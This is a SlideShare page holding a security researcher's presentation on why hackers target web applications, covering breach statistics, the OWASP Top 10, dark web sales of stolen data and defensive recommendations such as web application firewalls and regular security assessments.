SlideShare a Scribd company logo

What Makes Web Applications Desirable For Hackers

Download as PPTX, PDF
J
Jaime Manteiga

Unethical hackers target web applications for several reasons including financial gain, ideology, fun, and espionage. They communicate and sell stolen data on dark web forums using cryptocurrency, with some data selling for as little as $10. To protect applications, developers should follow best practices like the OWASP Top 10, implement web application firewalls, conduct security scans and assessments, and formalize a secure software development lifecycle.

Small Business & Entrepreneurship
1 of 19
1 WHAT MAKES WEB APPLICATIONS DESIRABLE FOR HACKERS How To Protect Yours CTO / Co-Founder at Venkon JAIME MANTEIGA
2 Agenda 01 02 03 To protect your applications, it is essential to know "how" web application hacking techniques work. What Techniques Do Attackers Use? Data is the new "gold" and hackers know that — a glance into dark web markets. What’s The Value Of Stolen Data? — How They Make Money Before asking the “how” it’s important to know the “why”. What Motivates Unethical Hackers? 04Understanding and thinking like an attacker will give us a new perspective on how to improve our web security posture. How Can We Protect Ourselves? 05Sources and citations. References 06Share your thoughts, fears, and doubts. Questions?
3 Introduction What Makes Web Applications Desirable For Hackers — How To Protect Yours Jaime Manteiga is a dynamic Information Security Professional and Researcher who assists organizations across the world by improving their information security posture and cybersecurity challenges. Additionally, Jaime Manteiga as an Information Security Researcher holds public recognition from organizations such as Tesla, Shopify, United Airlines and Spotify for helping them to identify and mitigate information security flaws. Bio @JaimeManteiga Active Social Media Networks: Get in touch CTO / Co-Founder at Venkon JAIME MANTEIGA @JaimeManteiga https://www.linkedin.com/in/jaimemanteiga/ https://medium.com/@jaime.manteiga jaime.manteiga@Venkon.us
4 There are hundreds of methods hackers can use to take advantage of the security vulnerabilities in your applications, but there are just a few reasons to do it. These are the top motives in descending order: Motivation IDEOLOGY FUN ESPIONAGE FINANCIAL GAIN What Motivates Unethical Hackers? Before asking the “how” it’s important to know the “why” * Sources of the stats will be exhibited at the references slide
5 What Motivates Unethical Hackers? Cybersecurity Breaches, Costs and Facts * Sources of the stats will be exhibited at the references slide 2016 2017 2018 Marriott Hacking Exposes Data of Up to 500 Million Guests. Including names, addresses, dates of birth, passport numbers, email addresses and phone numbers Marriott Hotels In 2016, 3 billion Yahoo accounts were hacked in one of the biggest breaches of all time. Yahoo Uber reported that hackers stole the information of over 57 million riders and drivers. Uber The average cost of a cybersecurity attack on a company is $2.4 million. Under Armour reported that its “My Fitness Pal” was hacked, affecting 150 million users. Under Armour 147.9 million consumers were affected by the Equifax Breach. Equifax  In 2017, cyber crime costs accelerated with organizations spending nearly 23 percent more than 2016 — on average about $11.7 million  The most expensive component of a cyber attack is information loss, which represents 43 percent of costs  The average cost per lost or stolen records per individual is $141 — but that cost varies per country. Breaches are most expensive in the United States ($225) and Canada ($190)  In companies with over 50k compromised records, the average cost of a data breach is $6.3 million  Damage related to cybercrime is projected to hit $6 trillion annually by 2021
6 What Motivates Unethical Hackers? Marriott Hotels Security Breach Nov. 30, 2018 Marriott Breach Exposes Data of Up to 500 Million Guests. The hotel chain said that personal details including names, addresses, dates of birth, passport numbers, email addresses and phone numbers for hundreds of millions of guests may have been compromised. In the United States, the New York Attorney General's office said it had opened an investigation into the data breach. Marriott's (MAR) stock is plunging on the news, falling more than 6% in trading. The combined company has 6,700 properties in more than 129 countries. The next figure illustrates how the stock value was sinking after the incident. Overview
7 Hacking web applications is nothing new, but the methods used by attackers are constantly changing. There are several factors to determine which techniques an attacker can attempt to use in order to compromise your application — such as, programming language, web server version, server operative system, database type, etc. Hence, there is no -one answer- to determine which method they will use to compromise your application. The following illustration represents the paths that attackers can use to discover weaknesses; sometimes it takes multiples paths to compromise an application, depending on its complexity. What Techniques Do Attackers Use?
8What Techniques Do Attackers Use? OWASP TOP 10 Explained A1 - Injection A2 - Broken Authentication A3 - Sensitive Data A4 - XMLExternal Entities (XXE) A5 - Broken AccessControl A6 - Security Misconf guration A7 - Cross-SiteScripting (XSS) A8 - Insecure Deserialization A9 - Using Componentswith Known Vulnerabilities A10 - Insuf cient Logging &Monitoring We summarized a list of the most critical web application security risks following OWASP Top 10 (Open Web Application Security Project). This list focuses on identifying the most serious web application security risks for a broad array of organizations and industries.
9 A2 A1 A3 A4 INJECTION Injection flaws, such as SQL, NoSQL, OS, and LDAP injection, occur when untrusted data is sent to an interpreter as part of a command or query. The attacker’s hostile data can trick the interpreter into executing unintended commands or accessing data without proper authorization. What Techniques Do Attackers Use? OWASP TOP 10 Explained Part 1 A5 Mixer BROKEN AUTHENTICATION Application functions related to authentication and session management are often implemented incorrectly, allowing attackers to compromise passwords, keys, or session tokens, or to exploit other implementation flaws to assume other users’ identities temporarily or permanently. . SENSITIVE DATA EXPOSURE Many web applications and APIs do not properly protect sensitive data, such as financial, healthcare, and PII. Attackers may steal or modify such weakly protected data to conduct credit card fraud, identity theft, or other crimes. XML EXTERNAL ENTITIES (XXE) Many older or poorly configured XML processors evaluate external entity references within XML documents. External entities can be used to disclose internal files using the file URI handler, internal file shares, internal port scanning, remote code execution, and denial of service attacks. BROKEN ACCESS CONTROL Restrictions on what authenticated users are allowed to do are often not properly enforced. Attackers can exploit these flaws to access unauthorized functionality and/or data, such as access other users' accounts, view sensitive files, modify other users’ data, change access rights, etc.
10 A7 A6 A8 A9 SECURITY MISCONFIGURATION Security misconfiguration is the most commonly seen issue. This is commonly a result of insecure default configurations, incomplete or ad hoc configurations, open cloud storage, misconfigured HTTP headers, and verbose error messages containing sensitive information. What Techniques Do Attackers Use? OWASP TOP 10 Explained Part 2 A10 Mixer CROSS-SITE SCRIPTING (XSS) XSS flaws occur whenever an application includes untrusted data in a new web page without proper validation or escaping, or updates an existing web page with user-supplied data using a browser API that can create HTML or JavaScript. INSECURE DESERIALIZATION Insecure deserialization often leads to remote code execution. Even if deserialization flaws do not result in remote code execution, they can be used to perform attacks, including replay attacks, injection attacks, and privilege escalation attacks. USING COMPONENTS WITH KNOWN VULNERABILITIES Components, such as libraries, frameworks, and other software modules, run with the same privileges as the application. If a vulnerable component is exploited, such an attack can facilitate serious data loss or server takeover. INSUFFICIENT LOGGING & MONITORING Insufficient logging and monitoring, coupled with missing or ineffective integration with incident response, allows attackers to further attack systems, maintain persistence, pivot to more systems, and tamper, extract, or destroy data.
11 We already know that the principal motivation for hackers is the financial gain — to know more in detail how much money they make, and how they sell the stolen data, we have to examine their communication channels. There are several ways for hackers to communicate, sell and exchange, but the most used is the "TOR Network," also known as "dark web or deep web." Simply put, TOR is an uncensored internet network principally used by cybercriminals. What’s The Value Of Stolen Data How They Make Money
12 Dark Web Forums are one of the places where cybercriminals trade their goods. They use underground forums as a safe interface to advertise their products and services. It is extremely challenging to get access to most of these forums since they require extensive vetting and trust from other cybercriminals. For this presentation, we took a “safe dive” into the dark web with the purpose of examining cybercriminals trading methods: What’s The Value Of Stolen Data How They Make Money Taking a Dive Into The “Deep Web” Figure 1 – Most of the forums were either taken down or seized by international organizations such as FBI, Interpol, Europol, and the DEA. It is pleasing to find that international government collaboration is in place to protect us from cybercriminals.
13 What’s The Value Of Stolen Data How They Make Money Taking a Dive Into The “Deep Web” Figure 2 – As previously mentioned, it is tough to get access to these forums. The figure above lists the rules to access the "unrestricted areas" of this forum.
14 What’s The Value Of Stolen Data How They Make Money Taking a Dive Into The “Deep Web” Figure 3 – We found another forum that used to have “free registration” — now you are required to be invited by a current member and pay a membership fee.
15 What’s The Value Of Stolen Data How They Make Money Taking a Dive Into The “Deep Web” Figure 4 – After an intensive research period, we were able to get access into one of the least used marketplace forums for cybercriminals. In this figure, we can appreciate a few things: 1. The principal payment method used by cybercriminals is the cryptocurrency Bitcoin. 2. Stolen data is somewhat cheaper than expected: ~ $10 USD dollars for millions of stolen Dropbox records. 3. Cybercriminal Marketplaces are mostly organized. This database appears to be from the security breach reported by Dropbox in 2016 — back then cybercriminals were selling this information for around $1500 USD.
16 What’s The Value Of Stolen Data How They Make Money Taking a Dive Into The “Deep Web” After our investigation in the deep web, we concluded that cybercriminals find very valuable and profitable our web applications. Below is a list of the most offered services by cybercriminals: This method provides direct access to your application which allows them to resell it. Web Shells They modify the integrity of the code to distribute malware to the users using an Exploit Kit. Distributed Malware For applications handling payments, a code captures the entered credit card data and then stores it in some local file for the hackers to access. Credit Card Scraping Installing a JS code in your application will allow the cybercriminals to start mining cryptocurrencies for them. Crypto mining They sell traffic redirection of your applications to other cybercriminals. Redirecting Traffic They download a copy of the database to categorize and sell the information afterward. Database CYBERCRIMINALS MARKETPLACE FOR WEB APPLICATIONS
17 Unethical hackers are restlessly trying to compromise web applications, and if we don't want to become one of their victims posted on the dark web, we must ensure that our systems are appropriately secured. There is more profitability in our web applications than we expected, even if no valuable data is present. Cybercriminals will use compromised web apps for a variety of things — needless to say, all actions of cybercriminals regarding our apps will affect us significantly. How can we protect ourselves? Sadly, there is no "one-answer," it depends on several factors that apply to specific requirements of your application and organization. The good news is, as we previously mentioned OWASP (Open Web Application Security Project) has an updated guideline created by industry experts and leading organizations to ensure your application is properly secured. Below are some recommended steps for improvements: How Can We Protect Ourselves? Recommendations For Improvements OWASP have countless guidelines and best practices documentation to improve your applications overall security posture. OWASP This is the best foundation when testing for security issues. Ensure that your tests follow this methodology. OWASP TOP 10 Formalize a process to perform regular automated and manual security scans. Security Scanning Reduce security issues and raise the overall security level for every stage of your application development. Formalize a Software Development Lifecycle (SDLC) WAF applies deep packet inspection (DPI) techniques to scan every HTTP request and response to identify and block any malicious content. Implement a Web Application Firewall Perform regular web application security assessment using an independent contractor. This provides a degree of autonomy to test controls that you could be missing and an external view of potential security risks. Independent Security Assessment
18 Below are the sources and citations used in this presentation: References 2018 Official Data Breach Investigations Report from Verizon: https://enterprise.verizon.com/resources/reports/dbir/ 2016 Uber Data Breach: https://www.uber.com/newsroom/2016-data-incident/ 2017 Equifax Data Breach: https://www.equifaxsecurity2017.com/2018/03/01/equifax-releases-updated-information-2017-cybersecurity-incident/ 2018 Under Armour Data Breach: http://investor.underarmour.com/releasedetail.cfm?ReleaseID=1062368 Average cost of a data breach (Accenture) https://www.accenture.com/us-en/event-cybertech-europe-2017?src=SOMS#block-insights-and-innovation 2016 Yahoo Data Breach: https://www.oath.com/press/yahoo-provides-notice-to-additional-users-affected-by-previously/ 2018 Marriot Hotels Data Breach: http://news.marriott.com/2018/11/marriott-announces-starwood-guest-reservation-database-security-incident/ OWASP TOP 10 - 2017: https://www.owasp.org/images/7/72/OWASP_Top_10-2017_%28en%29.pdf.pdf
19 THANKS FOR WATCHING Questions, Thoughts, Fears or Doubts? @JaimeManteiga @JaimeManteiga https://www.linkedin.com/in/jaimemanteiga/ https://medium.com/@jaime.manteiga jaime.manteiga@Venkon.us

Recommended

IRJET- Phishing and Anti-Phishing Techniques
IRJET- Phishing and Anti-Phishing TechniquesIRJET- Phishing and Anti-Phishing Techniques
IRJET- Phishing and Anti-Phishing TechniquesIRJET Journal
 
[Infographic] 7 Cyber attacks that shook the world
[Infographic] 7 Cyber attacks that shook the world[Infographic] 7 Cyber attacks that shook the world
[Infographic] 7 Cyber attacks that shook the worldSeqrite
 
RSA Monthly Online Fraud Report -- February 2014
RSA Monthly Online Fraud Report -- February 2014RSA Monthly Online Fraud Report -- February 2014
RSA Monthly Online Fraud Report -- February 2014EMC
 
Detecting malicious URLs using binary classification through ada boost algori...
Detecting malicious URLs using binary classification through ada boost algori...Detecting malicious URLs using binary classification through ada boost algori...
Detecting malicious URLs using binary classification through ada boost algori...IJECEIAES
 
Top 5 Cybersecurity Risks in Banking
Top 5 Cybersecurity Risks in BankingTop 5 Cybersecurity Risks in Banking
Top 5 Cybersecurity Risks in BankingSeqrite
 
Axxera End Point Security Protection
Axxera End Point Security ProtectionAxxera End Point Security Protection
Axxera End Point Security ProtectionShawn Crimson
 
Data security for healthcare industry
Data security for healthcare industryData security for healthcare industry
Data security for healthcare industrySeqrite
 
[Infographic] Data Loss Prevention
[Infographic] Data Loss Prevention[Infographic] Data Loss Prevention
[Infographic] Data Loss PreventionSeqrite
 

Recommended

IRJET- Phishing and Anti-Phishing Techniques
IRJET- Phishing and Anti-Phishing TechniquesIRJET- Phishing and Anti-Phishing Techniques
IRJET- Phishing and Anti-Phishing TechniquesIRJET Journal
 
[Infographic] 7 Cyber attacks that shook the world
[Infographic] 7 Cyber attacks that shook the world[Infographic] 7 Cyber attacks that shook the world
[Infographic] 7 Cyber attacks that shook the worldSeqrite
 
RSA Monthly Online Fraud Report -- February 2014
RSA Monthly Online Fraud Report -- February 2014RSA Monthly Online Fraud Report -- February 2014
RSA Monthly Online Fraud Report -- February 2014EMC
 
Detecting malicious URLs using binary classification through ada boost algori...
Detecting malicious URLs using binary classification through ada boost algori...Detecting malicious URLs using binary classification through ada boost algori...
Detecting malicious URLs using binary classification through ada boost algori...IJECEIAES
 
Top 5 Cybersecurity Risks in Banking
Top 5 Cybersecurity Risks in BankingTop 5 Cybersecurity Risks in Banking
Top 5 Cybersecurity Risks in BankingSeqrite
 
Axxera End Point Security Protection
Axxera End Point Security ProtectionAxxera End Point Security Protection
Axxera End Point Security ProtectionShawn Crimson
 
Data security for healthcare industry
Data security for healthcare industryData security for healthcare industry
Data security for healthcare industrySeqrite
 
[Infographic] Data Loss Prevention
[Infographic] Data Loss Prevention[Infographic] Data Loss Prevention
[Infographic] Data Loss PreventionSeqrite
 
10 Types Of Cyber Attacks And How They Can Affect You- Detox technologies.pdf
10 Types Of Cyber Attacks And How They Can Affect You- Detox technologies.pdf10 Types Of Cyber Attacks And How They Can Affect You- Detox technologies.pdf
10 Types Of Cyber Attacks And How They Can Affect You- Detox technologies.pdfCyber security professional services- Detox techno
 
Symantec Website Threat Report Part-1 2015
Symantec Website Threat Report Part-1 2015Symantec Website Threat Report Part-1 2015
Symantec Website Threat Report Part-1 2015RapidSSLOnline.com
 
The Whys and Wherefores of Web Security – by United Security Providers
The Whys and Wherefores of Web Security – by United Security ProvidersThe Whys and Wherefores of Web Security – by United Security Providers
The Whys and Wherefores of Web Security – by United Security ProvidersUnited Security Providers AG
 
Security weekly september 28 october 4, 2021
Security weekly september 28 october 4, 2021 Security weekly september 28 october 4, 2021
Security weekly september 28 october 4, 2021 Roen Branham
 
Chinese attack on USIS exploiting SAP vulnerability. Detailed review and comm...
Chinese attack on USIS exploiting SAP vulnerability. Detailed review and comm...Chinese attack on USIS exploiting SAP vulnerability. Detailed review and comm...
Chinese attack on USIS exploiting SAP vulnerability. Detailed review and comm...ERPScan
 
Why Should A Business Worry about Cyber Attacks?
Why Should A Business Worry about Cyber Attacks?Why Should A Business Worry about Cyber Attacks?
Why Should A Business Worry about Cyber Attacks?Ainsha Noordin (Umie)
 
HOST PROTECTION USING PROCESS WHITE-LISTING, DECEPTION AND REPUTATION SERVICES
HOST PROTECTION USING PROCESS WHITE-LISTING, DECEPTION AND REPUTATION SERVICESHOST PROTECTION USING PROCESS WHITE-LISTING, DECEPTION AND REPUTATION SERVICES
HOST PROTECTION USING PROCESS WHITE-LISTING, DECEPTION AND REPUTATION SERVICESAM Publications,India
 
Study on Phishing Attacks and Antiphishing Tools
Study on Phishing Attacks and Antiphishing ToolsStudy on Phishing Attacks and Antiphishing Tools
Study on Phishing Attacks and Antiphishing ToolsIRJET Journal
 
Symantec & WSJ PRESENTS "MALWARE on Main Street" ...
Symantec & WSJ PRESENTS "MALWARE on Main Street" ...Symantec & WSJ PRESENTS "MALWARE on Main Street" ...
Symantec & WSJ PRESENTS "MALWARE on Main Street" ...MZERMA Amine
 
5 Cybersecurity threats in Public Sector
5 Cybersecurity threats in Public Sector5 Cybersecurity threats in Public Sector
5 Cybersecurity threats in Public SectorSeqrite
 
cybercrime survival guide
cybercrime survival guidecybercrime survival guide
cybercrime survival guideGary Gray, MCSE
 
Different Types of Phishing Attacks
Different Types of Phishing AttacksDifferent Types of Phishing Attacks
Different Types of Phishing AttacksSysCloud
 
Phishing ppt
Phishing pptPhishing ppt
Phishing pptshindept123
 
Prevent phishing scams
Prevent phishing scamsPrevent phishing scams
Prevent phishing scamsronpoul
 
Phishing ppt
Phishing pptPhishing ppt
Phishing pptSanjay Kumar
 
Phishing
PhishingPhishing
PhishingSagar Rai
 
November 2017: Part 6
November 2017: Part 6November 2017: Part 6
November 2017: Part 6seadeloitte
 
Top 5 Cybersecurity Threats in Retail Industry
Top 5 Cybersecurity Threats in Retail IndustryTop 5 Cybersecurity Threats in Retail Industry
Top 5 Cybersecurity Threats in Retail IndustrySeqrite
 
December 2019 Part 10
December 2019 Part 10December 2019 Part 10
December 2019 Part 10seadeloitte
 
Grift horse money stealing trojan takes 10m android users for a ride
Grift horse money stealing trojan takes 10m android users for a rideGrift horse money stealing trojan takes 10m android users for a ride
Grift horse money stealing trojan takes 10m android users for a rideRoen Branham
 
Based on the below and using the 12 categories of threats identify 3 .pdf
Based on the below and using the 12 categories of threats identify 3 .pdfBased on the below and using the 12 categories of threats identify 3 .pdf
Based on the below and using the 12 categories of threats identify 3 .pdfarri2009av
 
Cyber Security
Cyber SecurityCyber Security
Cyber SecurityJamshidRaqi
 

More Related Content

What's hot

Symantec Website Threat Report Part-1 2015
Symantec Website Threat Report Part-1 2015Symantec Website Threat Report Part-1 2015
Symantec Website Threat Report Part-1 2015RapidSSLOnline.com
 
The Whys and Wherefores of Web Security – by United Security Providers
The Whys and Wherefores of Web Security – by United Security ProvidersThe Whys and Wherefores of Web Security – by United Security Providers
The Whys and Wherefores of Web Security – by United Security ProvidersUnited Security Providers AG
 
Security weekly september 28 october 4, 2021
Security weekly september 28 october 4, 2021 Security weekly september 28 october 4, 2021
Security weekly september 28 october 4, 2021 Roen Branham
 
Chinese attack on USIS exploiting SAP vulnerability. Detailed review and comm...
Chinese attack on USIS exploiting SAP vulnerability. Detailed review and comm...Chinese attack on USIS exploiting SAP vulnerability. Detailed review and comm...
Chinese attack on USIS exploiting SAP vulnerability. Detailed review and comm...ERPScan
 
Why Should A Business Worry about Cyber Attacks?
Why Should A Business Worry about Cyber Attacks?Why Should A Business Worry about Cyber Attacks?
Why Should A Business Worry about Cyber Attacks?Ainsha Noordin (Umie)
 
HOST PROTECTION USING PROCESS WHITE-LISTING, DECEPTION AND REPUTATION SERVICES
HOST PROTECTION USING PROCESS WHITE-LISTING, DECEPTION AND REPUTATION SERVICESHOST PROTECTION USING PROCESS WHITE-LISTING, DECEPTION AND REPUTATION SERVICES
HOST PROTECTION USING PROCESS WHITE-LISTING, DECEPTION AND REPUTATION SERVICESAM Publications,India
 
Study on Phishing Attacks and Antiphishing Tools
Study on Phishing Attacks and Antiphishing ToolsStudy on Phishing Attacks and Antiphishing Tools
Study on Phishing Attacks and Antiphishing ToolsIRJET Journal
 
Symantec & WSJ PRESENTS "MALWARE on Main Street" ...
Symantec & WSJ PRESENTS "MALWARE on Main Street" ...Symantec & WSJ PRESENTS "MALWARE on Main Street" ...
Symantec & WSJ PRESENTS "MALWARE on Main Street" ...MZERMA Amine
 
5 Cybersecurity threats in Public Sector
5 Cybersecurity threats in Public Sector5 Cybersecurity threats in Public Sector
5 Cybersecurity threats in Public SectorSeqrite
 
cybercrime survival guide
cybercrime survival guidecybercrime survival guide
cybercrime survival guideGary Gray, MCSE
 
Different Types of Phishing Attacks
Different Types of Phishing AttacksDifferent Types of Phishing Attacks
Different Types of Phishing AttacksSysCloud
 
Prevent phishing scams
Prevent phishing scamsPrevent phishing scams
Prevent phishing scamsronpoul
 
November 2017: Part 6
November 2017: Part 6November 2017: Part 6
November 2017: Part 6seadeloitte
 
Top 5 Cybersecurity Threats in Retail Industry
Top 5 Cybersecurity Threats in Retail IndustryTop 5 Cybersecurity Threats in Retail Industry
Top 5 Cybersecurity Threats in Retail IndustrySeqrite
 
December 2019 Part 10
December 2019 Part 10December 2019 Part 10
December 2019 Part 10seadeloitte
 
Grift horse money stealing trojan takes 10m android users for a ride
Grift horse money stealing trojan takes 10m android users for a rideGrift horse money stealing trojan takes 10m android users for a ride
Grift horse money stealing trojan takes 10m android users for a rideRoen Branham
 

What's hot (20)

10 Types Of Cyber Attacks And How They Can Affect You- Detox technologies.pdf
10 Types Of Cyber Attacks And How They Can Affect You- Detox technologies.pdf10 Types Of Cyber Attacks And How They Can Affect You- Detox technologies.pdf
10 Types Of Cyber Attacks And How They Can Affect You- Detox technologies.pdf
 
Symantec Website Threat Report Part-1 2015
Symantec Website Threat Report Part-1 2015Symantec Website Threat Report Part-1 2015
Symantec Website Threat Report Part-1 2015
 
The Whys and Wherefores of Web Security – by United Security Providers
The Whys and Wherefores of Web Security – by United Security ProvidersThe Whys and Wherefores of Web Security – by United Security Providers
The Whys and Wherefores of Web Security – by United Security Providers
 
Security weekly september 28 october 4, 2021
Security weekly september 28 october 4, 2021 Security weekly september 28 october 4, 2021
Security weekly september 28 october 4, 2021
 
Chinese attack on USIS exploiting SAP vulnerability. Detailed review and comm...
Chinese attack on USIS exploiting SAP vulnerability. Detailed review and comm...Chinese attack on USIS exploiting SAP vulnerability. Detailed review and comm...
Chinese attack on USIS exploiting SAP vulnerability. Detailed review and comm...
 
Why Should A Business Worry about Cyber Attacks?
Why Should A Business Worry about Cyber Attacks?Why Should A Business Worry about Cyber Attacks?
Why Should A Business Worry about Cyber Attacks?
 
HOST PROTECTION USING PROCESS WHITE-LISTING, DECEPTION AND REPUTATION SERVICES
HOST PROTECTION USING PROCESS WHITE-LISTING, DECEPTION AND REPUTATION SERVICESHOST PROTECTION USING PROCESS WHITE-LISTING, DECEPTION AND REPUTATION SERVICES
HOST PROTECTION USING PROCESS WHITE-LISTING, DECEPTION AND REPUTATION SERVICES
 
Study on Phishing Attacks and Antiphishing Tools
Study on Phishing Attacks and Antiphishing ToolsStudy on Phishing Attacks and Antiphishing Tools
Study on Phishing Attacks and Antiphishing Tools
 
Symantec & WSJ PRESENTS "MALWARE on Main Street" ...
Symantec & WSJ PRESENTS "MALWARE on Main Street" ...Symantec & WSJ PRESENTS "MALWARE on Main Street" ...
Symantec & WSJ PRESENTS "MALWARE on Main Street" ...
 
5 Cybersecurity threats in Public Sector
5 Cybersecurity threats in Public Sector5 Cybersecurity threats in Public Sector
5 Cybersecurity threats in Public Sector
 
cybercrime survival guide
cybercrime survival guidecybercrime survival guide
cybercrime survival guide
 
Different Types of Phishing Attacks
Different Types of Phishing AttacksDifferent Types of Phishing Attacks
Different Types of Phishing Attacks
 
Phishing ppt
Phishing pptPhishing ppt
Phishing ppt
 
Prevent phishing scams
Prevent phishing scamsPrevent phishing scams
Prevent phishing scams
 
Phishing ppt
Phishing pptPhishing ppt
Phishing ppt
 
Phishing
PhishingPhishing
Phishing
 
November 2017: Part 6
November 2017: Part 6November 2017: Part 6
November 2017: Part 6
 
Top 5 Cybersecurity Threats in Retail Industry
Top 5 Cybersecurity Threats in Retail IndustryTop 5 Cybersecurity Threats in Retail Industry
Top 5 Cybersecurity Threats in Retail Industry
 
December 2019 Part 10
December 2019 Part 10December 2019 Part 10
December 2019 Part 10
 
Grift horse money stealing trojan takes 10m android users for a ride
Grift horse money stealing trojan takes 10m android users for a rideGrift horse money stealing trojan takes 10m android users for a ride
Grift horse money stealing trojan takes 10m android users for a ride
 

Similar to What Makes Web Applications Desirable For Hackers

Based on the below and using the 12 categories of threats identify 3 .pdf
Based on the below and using the 12 categories of threats identify 3 .pdfBased on the below and using the 12 categories of threats identify 3 .pdf
Based on the below and using the 12 categories of threats identify 3 .pdfarri2009av
 
Alert logic anatomy owasp infographic
Alert logic anatomy owasp infographicAlert logic anatomy owasp infographic
Alert logic anatomy owasp infographicCMR WORLD TECH
 
PowerPoint Presentation On Ethical Hacking in Brief (Simple)
PowerPoint Presentation On Ethical Hacking in Brief (Simple)PowerPoint Presentation On Ethical Hacking in Brief (Simple)
PowerPoint Presentation On Ethical Hacking in Brief (Simple)Shivam Sahu
 
Are you fighting_new_threats_with_old_weapons
Are you fighting_new_threats_with_old_weaponsAre you fighting_new_threats_with_old_weapons
Are you fighting_new_threats_with_old_weaponsBhargav Modi
 
Discovering the Value of Verifying Web Application Security Using IBM Rationa...
Discovering the Value of Verifying Web Application Security Using IBM Rationa...Discovering the Value of Verifying Web Application Security Using IBM Rationa...
Discovering the Value of Verifying Web Application Security Using IBM Rationa...Alan Kan
 
What is the Cybersecurity plan for tomorrow?
What is the Cybersecurity plan for tomorrow?What is the Cybersecurity plan for tomorrow?
What is the Cybersecurity plan for tomorrow?Samvel Gevorgyan
 
A Guide to Internet Security For Businesses- Business.com
A Guide to Internet Security For Businesses- Business.comA Guide to Internet Security For Businesses- Business.com
A Guide to Internet Security For Businesses- Business.comBusiness.com
 
DEVSECOPS_the_beginning.ppt
DEVSECOPS_the_beginning.pptDEVSECOPS_the_beginning.ppt
DEVSECOPS_the_beginning.pptschwarz10
 
Internet threats and defence mechanism
Internet threats and defence mechanismInternet threats and defence mechanism
Internet threats and defence mechanismCAS
 
The uniqueness of the text61.5SHOW ALL MATCHESPage addre.docx
The uniqueness of the text61.5SHOW ALL MATCHESPage addre.docxThe uniqueness of the text61.5SHOW ALL MATCHESPage addre.docx
The uniqueness of the text61.5SHOW ALL MATCHESPage addre.docxarnoldmeredith47041
 
Ethical Hacking Interview Questions and Answers.pdf
Ethical Hacking Interview Questions and Answers.pdfEthical Hacking Interview Questions and Answers.pdf
Ethical Hacking Interview Questions and Answers.pdfShivamSharma909
 
Web Application Security
Web Application SecurityWeb Application Security
Web Application Securitysudip pudasaini
 
Year of pawnage - Ian trump
Year of pawnage - Ian trumpYear of pawnage - Ian trump
Year of pawnage - Ian trumpMAXfocus
 
Application security testing an integrated approach
Application security testing an integrated approachApplication security testing an integrated approach
Application security testing an integrated approachIdexcel Technologies
 
Information Security Risk Management
Information Security Risk ManagementInformation Security Risk Management
Information Security Risk Managementipspat
 
Banking and Modern Payments System Security Analysis
Banking and Modern Payments System Security AnalysisBanking and Modern Payments System Security Analysis
Banking and Modern Payments System Security AnalysisCSCJournals
 
Top 20 Ethical Hacker Interview Questions.pdf
Top 20 Ethical Hacker Interview Questions.pdfTop 20 Ethical Hacker Interview Questions.pdf
Top 20 Ethical Hacker Interview Questions.pdfinfosec train
 
Joint Presentation - Part 1: The Future Evolution of E-Banking & Cyber Securi...
Joint Presentation - Part 1: The Future Evolution of E-Banking & Cyber Securi...Joint Presentation - Part 1: The Future Evolution of E-Banking & Cyber Securi...
Joint Presentation - Part 1: The Future Evolution of E-Banking & Cyber Securi...Knowledge Group
 
TECHNIQUES FOR ATTACKING WEB APPLICATION SECURITY
TECHNIQUES FOR ATTACKING WEB APPLICATION SECURITYTECHNIQUES FOR ATTACKING WEB APPLICATION SECURITY
TECHNIQUES FOR ATTACKING WEB APPLICATION SECURITYijistjournal
 

Similar to What Makes Web Applications Desirable For Hackers (20)

Based on the below and using the 12 categories of threats identify 3 .pdf
Based on the below and using the 12 categories of threats identify 3 .pdfBased on the below and using the 12 categories of threats identify 3 .pdf
Based on the below and using the 12 categories of threats identify 3 .pdf
 
Cyber Security
Cyber SecurityCyber Security
Cyber Security
 
Alert logic anatomy owasp infographic
Alert logic anatomy owasp infographicAlert logic anatomy owasp infographic
Alert logic anatomy owasp infographic
 
PowerPoint Presentation On Ethical Hacking in Brief (Simple)
PowerPoint Presentation On Ethical Hacking in Brief (Simple)PowerPoint Presentation On Ethical Hacking in Brief (Simple)
PowerPoint Presentation On Ethical Hacking in Brief (Simple)
 
Are you fighting_new_threats_with_old_weapons
Are you fighting_new_threats_with_old_weaponsAre you fighting_new_threats_with_old_weapons
Are you fighting_new_threats_with_old_weapons
 
Discovering the Value of Verifying Web Application Security Using IBM Rationa...
Discovering the Value of Verifying Web Application Security Using IBM Rationa...Discovering the Value of Verifying Web Application Security Using IBM Rationa...
Discovering the Value of Verifying Web Application Security Using IBM Rationa...
 
What is the Cybersecurity plan for tomorrow?
What is the Cybersecurity plan for tomorrow?What is the Cybersecurity plan for tomorrow?
What is the Cybersecurity plan for tomorrow?
 
A Guide to Internet Security For Businesses- Business.com
A Guide to Internet Security For Businesses- Business.comA Guide to Internet Security For Businesses- Business.com
A Guide to Internet Security For Businesses- Business.com
 
DEVSECOPS_the_beginning.ppt
DEVSECOPS_the_beginning.pptDEVSECOPS_the_beginning.ppt
DEVSECOPS_the_beginning.ppt
 
Internet threats and defence mechanism
Internet threats and defence mechanismInternet threats and defence mechanism
Internet threats and defence mechanism
 
The uniqueness of the text61.5SHOW ALL MATCHESPage addre.docx
The uniqueness of the text61.5SHOW ALL MATCHESPage addre.docxThe uniqueness of the text61.5SHOW ALL MATCHESPage addre.docx
The uniqueness of the text61.5SHOW ALL MATCHESPage addre.docx
 
Ethical Hacking Interview Questions and Answers.pdf
Ethical Hacking Interview Questions and Answers.pdfEthical Hacking Interview Questions and Answers.pdf
Ethical Hacking Interview Questions and Answers.pdf
 
Web Application Security
Web Application SecurityWeb Application Security
Web Application Security
 
Year of pawnage - Ian trump
Year of pawnage - Ian trumpYear of pawnage - Ian trump
Year of pawnage - Ian trump
 
Application security testing an integrated approach
Application security testing an integrated approachApplication security testing an integrated approach
Application security testing an integrated approach
 
Information Security Risk Management
Information Security Risk ManagementInformation Security Risk Management
Information Security Risk Management
 
Banking and Modern Payments System Security Analysis
Banking and Modern Payments System Security AnalysisBanking and Modern Payments System Security Analysis
Banking and Modern Payments System Security Analysis
 
Top 20 Ethical Hacker Interview Questions.pdf
Top 20 Ethical Hacker Interview Questions.pdfTop 20 Ethical Hacker Interview Questions.pdf
Top 20 Ethical Hacker Interview Questions.pdf
 
Joint Presentation - Part 1: The Future Evolution of E-Banking & Cyber Securi...
Joint Presentation - Part 1: The Future Evolution of E-Banking & Cyber Securi...Joint Presentation - Part 1: The Future Evolution of E-Banking & Cyber Securi...
Joint Presentation - Part 1: The Future Evolution of E-Banking & Cyber Securi...
 
TECHNIQUES FOR ATTACKING WEB APPLICATION SECURITY
